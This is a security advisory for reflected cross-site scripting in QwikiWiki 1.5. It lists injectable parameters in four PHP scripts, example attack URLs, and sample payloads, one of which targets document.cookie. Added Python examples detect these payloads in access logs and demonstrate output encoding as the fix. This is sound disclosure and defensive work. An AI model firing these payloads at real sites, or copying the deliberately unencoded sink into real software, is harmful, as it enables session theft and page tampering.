QwikiWiki 1.5 suffers from multiple script injection vulnerabilities in index.php, login.php, and pageindex.php.
6fe9f961b16a9b3fb9bd7dbc6839e54b62f887ed93a529b4a0c5a24e2b3960a6
QwikiWiki 1.5 <== Multiple Script Insertion Vulnerability
===================================
Information of Software:
Software: QwikiWiki 1.5
Site: http://qwikiwiki.com
Description: QwikiWiki is a very simple wiki CMS. It has several XSS
vulnerabilities, and they are not difficult to exploit.
===================================
Bug:
1) index.php Multiple Script Insertion Vulnerability
QwikiWiki contains a flaw that allows remote cross-site scripting attacks.
In index.php a user can inject script through the from parameter, the help
parameter, or both together (page=Home&from=, page=Home&help= and page=Home&from=Home&help=).
Example:
http://[target]/index.php?page=Home&from=[XSS]
http://[target]/index.php?page=Home&help=[XSS]
http://[target]/index.php?page=Home&from=Home&help=[XSS]
---------------------------------------------------
2) login.php Multiple Script Insertion Vulnerability
Example:
http://[target]/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]
---------------------------------------------------
3) pageindex.php Script Insertion Vulnerability
Example:
http://[target]/pageindex.php?nothing=nothing&help=[XSS]
---------------------------------------------------
4) recentchanges.php Script Insertion Vulnerability
Example:
http://[target]/recentchanges.php?nothing=nothing&help=[XSS]
---------------------------------------------------
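All four issues above are reflected XSS through GET parameters, so an attempt leaves a trace in the web server access log. The following is an added example (not part of the advisory and not QwikiWiki code) that walks access-log lines in the common log format, keeps only requests to the four scripts named above, and flags any of the listed parameters whose decoded value contains attribute-breaking or tag-opening characters. The script paths and parameter names come from the advisory; the log lines are constructed samples, and the payloads in them are the advisory's own, percent-encoded.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scripts and query parameters named in the advisory.
AFFECTED_PARAMS = {
    "/index.php": {"from", "help"},
    "/login.php": {"page", "action", "debug", "help", "username", "password"},
    "/pageindex.php": {"help"},
    "/recentchanges.php": {"help"},
}

# Characters and fragments that have no business in these parameters but are
# needed to break out of an attribute or open a tag.
SUSPICIOUS = re.compile(r'[<>"]|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)

# Apache/nginx "common" log format: client - - [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def inspect_line(line):
    """Return a finding for a request that pushes markup into an affected
    parameter of an affected script, or None if the line is uninteresting."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, when, method, target, status = m.groups()
    parts = urlsplit(target)
    watched = AFFECTED_PARAMS.get(parts.path)
    if watched is None:
        return None
    hits = []
    # parse_qs percent-decodes values and keeps duplicates (action=...&action=...)
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            if SUSPICIOUS.search(value):
                hits.append((name, value))
    if not hits:
        return None
    return {"client": client, "time": when, "path": parts.path, "status": status, "hits": hits}


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the findings."""
    return [finding for finding in map(inspect_line, lines) if finding]


# Constructed sample log lines (not real traffic). Lines 2 and 4 carry the
# advisory's own payloads, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2006:10:01:02 +0000] "GET /index.php?page=Home&from=Home HTTP/1.1" 200 1532',
    '10.0.0.7 - - [12/Mar/2006:10:01:09 +0000] "GET /index.php?page=Home&help=%22%3E%3Cscript%3Ealert(%22lol%22);%3C/script%3E HTTP/1.1" 200 1610',
    '10.0.0.9 - - [12/Mar/2006:10:02:30 +0000] "GET /pageindex.php?nothing=nothing&help=true HTTP/1.1" 200 904',
    '10.0.0.9 - - [12/Mar/2006:10:02:41 +0000] "GET /login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=%22%3E%3Cbody%20bgcolor%3D%22black%22%3E%3C/body%3E&password=1 HTTP/1.1" 200 1207',
    '10.0.0.3 - - [12/Mar/2006:10:03:00 +0000] "GET /about.php?help=%3Cb%3E HTTP/1.1" 404 212',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["path"], finding["hits"])
```

Only the second and fourth sample lines are reported: the legitimate help=true request and the request to a script not on the list are ignored, which keeps the rule specific to the advisory rather than to every quote character in the log.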
You can replace the value [XSS] with:
"><body bgcolor="black"></body>
"><alert(document.cookie);</script>
"><script>alert("lol");</script>
or any other JavaScript or HTML code
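Each of those payloads works by closing the attribute the parameter is echoed into and opening a new tag. The fix is contextual output encoding at the sink. The following is an added example (not from the advisory and not QwikiWiki's code, and written in Python rather than PHP) that models the assumed sink, an unencoded help value inside a hidden input, beside the same sink with html.escape applied, and uses the standard-library HTML parser to show which tags each version actually produces. The PHP equivalent of html.escape(value, quote=True) is htmlspecialchars($value, ENT_QUOTES).

```python
import html
from html.parser import HTMLParser

# The advisory's three sample payloads, copied verbatim.
PAYLOADS = [
    '"><body bgcolor="black"></body>',
    '"><alert(document.cookie);</script>',
    '"><script>alert("lol");</script>',
]


def render_help_vulnerable(help_value):
    """Assumed sink: the help parameter is concatenated into an attribute value
    with no encoding (a model of the bug, not QwikiWiki's own template)."""
    return '<input type="hidden" name="help" value="' + help_value + '">'


def render_help_safe(help_value):
    """Same sink with output encoding for the attribute context. quote=True
    turns & < > " ' into entities, so the value can never close the attribute."""
    return '<input type="hidden" name="help" value="' + html.escape(help_value, quote=True) + '">'


class TagCollector(HTMLParser):
    """Record every start tag a browser-like parser sees in the rendered output."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("vulnerable:", tags_in(render_help_vulnerable(payload)))
        print("safe:      ", tags_in(render_help_safe(payload)))
```

With the vulnerable renderer the well-formed payloads yield a second tag (body or script) after the input element; with the encoded renderer every payload yields only the input element, because the escaped value contains no literal quote or angle bracket. Encoding has to match the context: this is the rule for HTML attribute and element bodies, and a value placed inside a script block or a URL needs that context's encoding instead.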
===================================
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================